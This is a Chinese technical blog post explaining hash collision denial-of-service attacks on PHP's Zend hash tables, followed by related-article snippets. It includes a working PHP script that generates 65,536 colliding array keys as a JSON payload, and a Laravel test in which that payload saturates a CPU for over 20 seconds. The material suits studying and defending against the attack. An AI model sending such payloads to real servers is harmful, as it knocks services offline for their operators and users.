PHP Hash Collision攻击原理

之前介绍了所有语言通用的Hash Collision攻击原理一种高级的DoS攻击-Hash碰撞攻击，介绍的比较宽泛。因为Java相关的Hash Collision文章比较少，所以最先写了Java的攻击原理 Java Hash Collision之数据生产。

网上关于PHP Hash Collision的文章特别多，得益于很多年前鸟哥的一篇文章 PHP数组的Hash冲突实例，因为这篇文章让行业内的PHPer们都愿意花时间去了解。

哈希表是一种查找效率极高的数据结构，PHP中的哈希表用于表示Array数据类型，在Zend虚拟机内部也用于存储上下文环境信息（执行上下文的变量及函数均使用哈希表结构存储）。

理想情况下哈希表插入和查找操作的时间复杂度均为O(1)，任何一个数据项可以在一个与哈希表长度无关的时间内计算出一个哈希值（key），然后在常量时间内定位到一个桶（术语bucket，表示哈希表中的一个位置）。当然这是理想情况下，因为任何哈希表的长度都是有限的，所以一定存在不同的数据项具有相同哈希值的情况，此时不同数据项被定为到同一个桶，称为碰撞（collision）。哈希表的实现需要解决碰撞问题，碰撞解决大体有两种思路，第一种是根据某种原则将被碰撞数据定为到其它桶，例如线性探测——如果数据在插入时发生了碰撞，则顺序查找这个桶后面的桶，将其放入第一个没有被使用的桶；第二种策略是每个桶不是一个只能容纳单个数据项的位置，而是一个可容纳多个数据的数据结构（例如链表或红黑树），所有碰撞的数据以某种数据结构的形式组织起来。

不论使用了哪种碰撞解决策略，都导致插入和查找操作的时间复杂度不再是O(1)。以查找为例，不能通过key定位到桶就结束，必须还要比较原始key（即未做哈希之前的key）是否相等，如果不相等，则要使用与插入相同的算法继续查找，直到找到匹配的值或确认数据不在哈希表中。

PHP是使用单链表存储碰撞的数据，因此实际上PHP哈希表的平均查找复杂度为O(L)，其中L为桶链表的平均长度；而最坏复杂度为O(N)，此时所有数据全部碰撞，哈希表退化成单链表。哈希表结构如下图

Hash Function也叫哈希散列函数，通过散列函数我们能将各种类型的key转换为有限空间内的一个内存地址。常见的散列函数有MD5，SHA。不过HashTable中基本不会用MD5，SHA算法,因为这两类算法太耗时，基本所有的编程语言都会选择Times*类型算法，比如Times31,times33,times37。Java使用的Hash算法为Times31，PHP使用的Hash算法为times33……

一. PHP Hash function实现

PHP HashTable的哈希算法如下：

hash(key)=key & nTableMask

即简单将数据的原始key与HashTable的nTableMask进行按位与即可。如果原始key为字符串，则首先使用Times33算法将字符串转为整形再与nTableMask按位与。

hash(strkey)=time33(strkey) & nTableMask

下面是Zend源码中查找哈希表的代码：

ZEND_API int zend_hash_index_find(const HashTable ht, ulong h, void *pData)
{
    uint nIndex;
    Bucket *p;

    IS_CONSISTENT(ht);
    //获取索引
    nIndex = h & ht->nTableMask;

    p = ht->arBuckets[nIndex];
    while (p != NULL) {
        if ((p->h == h) && (p->nKeyLength == 0)) {
            *pData = p->pData;
            return SUCCESS;
        }
        p = p->pNext;
    }
    return FAILURE;
}
//用于查找字符串key
ZEND_API int zend_hash_find(const HashTable ht, const char arKey, uint nKeyLength, void **pData)
{
    ulong h;
    uint nIndex;
    Bucket *p;

    IS_CONSISTENT(ht);

    h = zend_inline_hash_func(arKey, nKeyLength);
    //获取索引
    nIndex = h & ht->nTableMask;

    p = ht->arBuckets[nIndex];
    while (p != NULL) {
        if ((p->h == h) && (p->nKeyLength == nKeyLength)) {
            if (!memcmp(p->arKey, arKey, nKeyLength)) {
                *pData = p->pData;
                return SUCCESS;
            }
        }
        p = p->pNext;
    }
    return FAILURE;
}

二. 通过PHP zend_hash_index_find函数实现逆推

知道了PHP内部哈希表的算法，就可以利用其原理构造用于攻击的数据。一种最简单的方法是利用掩码规律制造碰撞。上文提到Zend HashTable的长度nTableSize会被圆整为2的整数次幂，假设我们构造一个2^16的哈希表，则nTableSize的二进制表示为：1 0000 0000 0000 0000，而nTableMask = nTableSize – 1为：0 1111 1111 1111 1111。接下来，可以以0为初始值，以2^16为步长，制造足够多的数据，可以得到如下推测：

0000 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0

0001 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0

0010 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0

0011 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0

0100 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0

……

概况来说只要保证后16位均为0，则与掩码位于后得到的哈希值全部碰撞在位置0。

三. 通过脚本批量产出碰撞数据

如上我们已经推算出碰撞数据的实现方式，接下来我通过PHP生成碰撞数据。如果要生成大量的碰撞数据，这里最好不要使用PHP来生成，因为操作不当就会变成攻击自己的脚本。

$size = pow(2, 16); // 16 is just an example, could also be 15 or 17
$maxKey = ($size - 1) * $size;
$startTime = microtime(true);
$array = [];
for ($key = 0; $key <= $maxKey; $key += $size) {
    $array[$key] = 0;
}
file_put_contents("t.log",json_encode($array));
$endTime = microtime(true);

echo 'Inserting ', $size, ' evil elements took ', $endTime - $startTime, ' seconds', "\n";

最后我们生成了如下数据(截取了前面几条)：

{
    "0":0,
    "65536":0,
    "131072":0,
    "196608":0,
    "262144":0,
    "327680":0,
    "393216":0,
    "458752":0,
    "524288":0,
    "589824":0,
    "655360":0,
    "720896":0
}

四. 在PHP中测试碰撞数据

通过程序我们生成了65536条碰撞数据，然后在Laravel中做个简单的测试，测试代码如下：

public function posts(){

    $startTime = microtime(true);
    //获取http body中的数据
    $rest = $this->request->getContent();
    json_decode($rest,true);
    $endTime = microtime(true);

    echo ' evil elements took ', $endTime - $startTime, ' seconds', "\n";
}

测试结果，一个CPU被打到100%，持续了20多秒。结束该php-fpm进程后恢复。

至此写了三篇关于HashTable的文章，前两篇文章开头都有链接，能帮助大家对HahsTable有更深的理解，之后不会再更新HashTable相关的文章了。

我的博客原文地址：PHP Hash Collision攻击原理

时间： 2024-09-19 01:43:26

PHP Hash Collision攻击原理的相关文章

一种高级的DoS攻击-Hash碰撞攻击

这是迄今为止第一个让我觉得后怕的攻击方式,涉及的范围广难以防御,攻击效果立竿见影.大量的网站和Web接口都未做Hash碰撞攻击的防御,一拿一个准. 随着RESTful风格的接口普及,程序员默认都会使用json作为数据传递的方式.json格式的数据冗余少,兼容性高,从提出到现在已被广泛的使用,可以说成为了Web的一种标准.无论我们服务端使用什么语言,我们拿到json格式的数据之后都需要做jsonDecode(),将json串转换为json对象,而对象默认会存储于Hash Table,而Hash T

Java Hash Collision之数据生产

上一篇文章一种高级的DoS攻击-Hash碰撞攻击我通过伪造Hash Collision数据实现了对Java的DoS攻击,下面说说如何生产大量的攻击数据. HashTable是一种非常常用的数据结构.它存取速度快,结构简单,深得程序员喜爱.HashTable大致数据结构如下图: Hash Function也叫哈希散列函数,通过散列函数我们能将各种类型的key转换为有限空间内的一个内存地址.常见的散列函数有MD5,SHA.不过HashTable中基本不会用MD5,SHA算法,因为这两类算法太耗时,基

PHP内核探索:哈希表碰撞攻击原理_php实例

下面通过图文并茂的方式给大家展示PHP内核探索:哈希表碰撞攻击原理. 最近哈希表碰撞攻击(Hashtable collisions as DOS attack)的话题不断被提起,各种语言纷纷中招.本文结合PHP内核源码,聊一聊这种攻击的原理及实现. 哈希表碰撞攻击的基本原理哈希表是一种查找效率极高的数据结构,很多语言都在内部实现了哈希表.PHP中的哈希表是一种极为重要的数据结构,不但用于表示Array数据类型,还在Zend虚拟机内部用于存储上下文环境信息(执行上下文的变量及函数均使用哈希表结

DDOS攻击原理及防护方法论

从 07年的爱沙尼亚DDOS信息战,到今年广西南宁30个网吧遭受到DDOS勒索,再到新浪网遭受DDOS攻击无法提供对外服务500多分钟. DDOS愈演愈烈,攻击事件明显增多,攻击流量也明显增大,形势十分严峻,超过1G的攻击流量频频出现,CNCERT/CC掌握的数据表明,最高时达到了 12G,这样流量,甚至连专业的机房都无法抵挡.更为严峻的是:利用DDOS攻击手段敲诈勒索已经形成了一条完整的产业链!并且,攻击者实施成本极低,在网上可以随便搜索到一大堆攻击脚本.工具工具,对攻击者的技术要求也越来越

内网渗透防御：如何防御Hash注入攻击

渗透测试人员对Pass-the-Hash(PtH)攻击都很熟悉.我们常在渗透测试中用到它.如果你的职责包括网络入侵防御,你至少应该了解其攻击方法.不管你有多少经验,你对问题了解得可能不深,或许还不知道它是怎么解决的,注意是"解决"而不是"修复". 概述攻击者通过一定办法获取了Windows计算机的本地管理员权限,可以在内存中寻找其它本地或域内账户登录后的hash,因为电脑正在运行.这些hash可以"传递"(不需要破解)给其它的计算机或者服务,作

Linux SYN攻击原理及措施解决

SYN攻击原理图: TCP在传递数据前需要经过三次握手,SYN攻击的原理就是向服务器发送SYN数据包,并伪造源IP地址. 服务器在收到SYN数据包时,会将连接加入backlog队列,并向源IP发送SYN-ACK数据包,并等待ACK数据包,以完成三次握手建立连接. 由于源IP地址是伪造的不存在主机IP,所以服务器无法收到ACK数据包,并会不断重发,同时backlog队列被不断被攻击的SYN连接占满,导致无法处理正常的连接.SYN攻击的应对措施针对SYN攻击的几个环节,提出相应的处理方法: 方式1

DDoS的攻击原理与防御方法

DoS攻击.DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service的简写就是分布式拒绝服务,而DRDoS就是Distributed Reflection Denial of Service的简写,这是分布反射式拒绝服务的意思. 不过这3中攻击方法最厉害的还是DDoS,那个DRDoS攻击虽然是新近出的一种攻击方法,但它只是DDoS攻击的变形,它的唯一不同就是不用占领

浅谈利用JavaScript进行的DDoS攻击原理与防御

这篇文章主要介绍了浅谈利用JavaScript进行的DDoS攻击原理与防御,以及介绍了相关的中间人攻击原理,需要的朋友可以参考下分布式拒绝服务攻击(DDoS)攻击是一种针对网站发起的最古老最普遍的攻击.Nick Sullivan是网站加速和安全服务提供商CloudFlare的一名系统工程师.近日,他撰文介绍了攻击者如何利用恶意网站.服务器劫持和中间人攻击发起DDoS攻击,并说明了如何使用HTTPS以及即将到来的名为"子资源一致性(Subresource I

ARP攻击原理简析及防御措施

0x1 简介网络欺骗攻击作为一种非常专业化的攻击手段,给网络安全管理者,带来严峻的考验.网络安全的战场已经从互联网蔓延到用户内部的网络,特别是局域网.目前利用ARP欺骗的木马病毒在局域网中广泛传播,导致网络随机掉线甚至整体瘫痪,通讯被窃听,信息被篡改等严重后果. 0x2 ARP协议概述 ARP协议(address resolution protocol)地址解析协议一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网中传输数据的网卡却不能直接识别IP地址,所以用ARP解析协议将I

猜你喜欢

站长熬夜加班技巧

1:不要吃泡面来填饱肚子,以免火气太大,最好尽量以水果.土司.面包.清粥小菜来充饥. 2:开始熬夜前,来一颗维他命B群营养丸,维他命B能够解除疲劳,增强人体免疫力. 3:提神饮料,最好以绿茶为主,可以 ...

用Canvas做的ASP无组件生成图片验证码

无组件|验证码点击这里下载源码相关图片如下:Dim objCanvasDim PointX,PointY,PointColorDim iTempDim SafeCodeDim R,G,B,cc,k ...

文刀木水：交换友情链接的那些事

关于友情链接这个话题应该有很多人都谈过了,在文刀木水这个博客没有做之前也写过关于友情链接的文章,那个时候也谈到了关于友情链接的一些问题和我们需要注意的问题.不可否认友情链接的确是网站外部链接之中非 ...

再学GDI+[9]: DrawPolygon

本例效果图: 代码文件:unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Con ...

大量php session临时文件带来的服务器效率问题

早上流量有点大,网站出口流量大概5M左右,访问质量却不太好,web响应比较慢,切系统负载很高. 检查了下各web节点,所有web服务器的httpd线程均达到满负荷,很奇怪.因为所有web节点都通过n ...

C++内存管理详解

伟大的Bill Gates 曾经失言: 640K ought to be enough for everybody - Bill Gates 1981 程序员们经常编写内存管理程序,往往提心吊胆.如果 ...

用WID、WPS和Adobe Flex为业务流程应用程序开发富Web客户机

用WebSphere Integration Developer.WebSphere Process Server和Adobe Flex为业务流程应用程序开发富Web客户机简介可以使用 WebSp ...

WinForm控件开发总结(十一) 调试控件的设计时行为

前面的一些文章绝大部分都是要讲控件的设计时的行为,既然涉及到这么多的设计时行为的代码编写 ,那么就有必要就一下如何来调试控件的设计行为. 调试控件的设计时行为和调试DLL的方式非常的相似,因为DLL是 ...

超级实用的Excel图表技巧解析

超级实用的Excel图表技巧解析 [例]如下图所示的excel图表中,从下至上分三种蓝色作为背景,分别显示差(<50).中(<100).优(<150)3个档次. ...

ps生活照调色处理

原图最终效果 1.打开原图,按ctrl+j复制一层,一般要养成这种好习惯,我们将这一层命名为"第一层".然后再复制的这一层对人物的皮肤进行稍微的修饰,去除斑点,这一步就不详细介绍 ...

Windows系统常用数据缓存介绍

什么是缓存?听起来好像很技术范儿,其实就是把用户常用的一些「文件」或其它类型数据给临时存储到了某个地方,在下次需要使用时便可读取和使用.这样 Windows 就可以从固定地点去拿缓存数据,而不必再 ...

ANT安装与测试和简明教程

1 window 一.安装ant 到官方主页http://ant.apache.org下载新版(目前为Ant1.8.1)的ant,得到的是一个apache-ant-1.8.1-bin.zip ...

ActiveMQ怎么实现多个生产者向一个队列目标发送信息？求教，最好有代码demo

问题描述 ActiveMQ怎么实现多个生产者向一个队列目标发送信息?求教,最好有代码demo ActiveMQ怎么实现多个生产者向一个队列目标发送信息?求教,最好有代码demo 解决方案 packag ...

JAVA学习（四）：Java流程控制语句（顺序结构、if条件语句、switch条件语句、循环语句与跳转语句）

Java流程控制语句本博文将对JAVA中组成各种结构的控制语句进行重点介绍,主要内容是区别于C/C++中的流程控制语句的重点解析. 1.顺序语句顺序结构中的语句可分为:表达式语句.空语句和复合语句 ...

js中setTimeout和setInterval性能详解总结

在写H5游戏时经常需要使用定时刷新页面实现动画效果,比较常用即setTimeout()以及setInterval() setTimeout() 方法用于在指定的毫秒数后调用函数或计算表达式,而setI ...

深入探析koa之异步回调处理篇

在上一篇中我们梳理了koa当中中间件的洋葱模型执行原理,并实现了一个可以让洋葱模型自动跑起来的流程管理函数.这一篇,我们再来研究一下koa当中异步回调同步化写法的原理,同样的,我们也会实现一个管理函数 ...

Go知识点记录

import包命名 import的包可以给它命名 import l4g "code.google.com/p/log4go" testing的Error和Fatal的区别 Erro ...

android 仿淘宝的加载刷新效果

自定义view: package com.taobao.view; import android.content.Context; import android.util.AttributeSet; ...

花钱买感觉：情感营销的价值需要注意的几个方面

中介交易 SEO诊断淘宝客云主机技术大厅不管从事什么行业,企业运用各种营销手段来打响企业品牌,促进产品销售已是必用手段,曾几何时,消费者购买商品.服务,已经从原来的远观到后来的近看(自选超市) ...

赶集网回应造谣门：明年初将在行业内率先盈利

遭遇"造谣门事件"打击的赶集网(微博)正显示出强劲的发展势头,据内部人士透露,赶集网2011年的整体销售额高达4000万美金,相比2010年增长近4倍.赶集网无论是在内部运营还是在 ...

征信专题：坐在大数据金山上的Equifax

上期我们介绍了征信三巨头背后的大佬--费埃哲公司.他们的评分标准已经成为了美国征信业的事实标准.国内很多公司包括宜信等都是基于这个评分模型进行二次开发的.这期我们想通过一个大公司的案例来看看,这种数据 ...

《实践者的研究方法》—— 3.5 过程评估与改进

3.5 过程评估与改进软件过程并不能保证软件按期交付,也不能保证软件满足客户要求,或是软件具备了长期质量保证的技术特点(第19章).软件过程模型必须与切实的软件工程实践相结合(本书第二部分).另外, ...

猪流感来了我们该反思什么

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断淘宝客云主机技术大厅 2003年的爆发的"禽流 ...

附件：sendmail.asp

<!-- This sample script uses the CDO for NTS Library to send email to a specific user. ...

小弟请教一个panel的问题，恳请大家帮帮我

问题描述我在panel2的左边加了一个jPanel2,jPanel2上有三个按钮,我现在做的是,点每个按钮都在panel2的右边生成一个jPanel,这三个按钮生成panel的位置一样,我是通过设置 ...

文本预处理

问题描述用java怎样读取一个文本,然后怎样去掉标点符号等等!!! 解决方案解决方案二:io读过滤io写解决方案三:IO+字符串处理(+正则表达式)解决方案四:可以利用流来处理FileInputS ...

100分求高手将fckeditor中的浏览器图片列表进行分页

问题描述 fckeditor中点浏览后,出现的图片列表是没有分页的,而客户因每天有大量的图片要上传,打开时就慢了,求高手加上个分页显示功能,达到分页显示不胜感谢,并双手送上分!急原图如下:在显示中加上 ...

ASP 连接Access数据库的登陆系统_应用技巧

一.基本目标首先在Access数据库Database.mdb中存在着用户信息表test: 编写一个登陆系统,如果用户输入的用户名在表中没有,则提示"查无此人",如果输入密码错误, ...

智能电视商业模式逐步“互联网化”

硅谷网11月15日讯昨日,小米科技发布小米盒子,以机顶盒为主打进军智能电视领域.而就在几天前,创新工场完成投资乐视网旗下乐视致新(乐视TV).目前,除传统电视品牌厂商之外,更多的IT. 互联网公司 ...

求高手指点opengl中glutMainLoop();错误

问题描述 voidmyDisplay(void){glClear(GL_COLOR_BUFFER_BIT);glColor3f(0.0f,1.0f,0.0f);glRectf(-0.5f,-0.5f, ...

热搜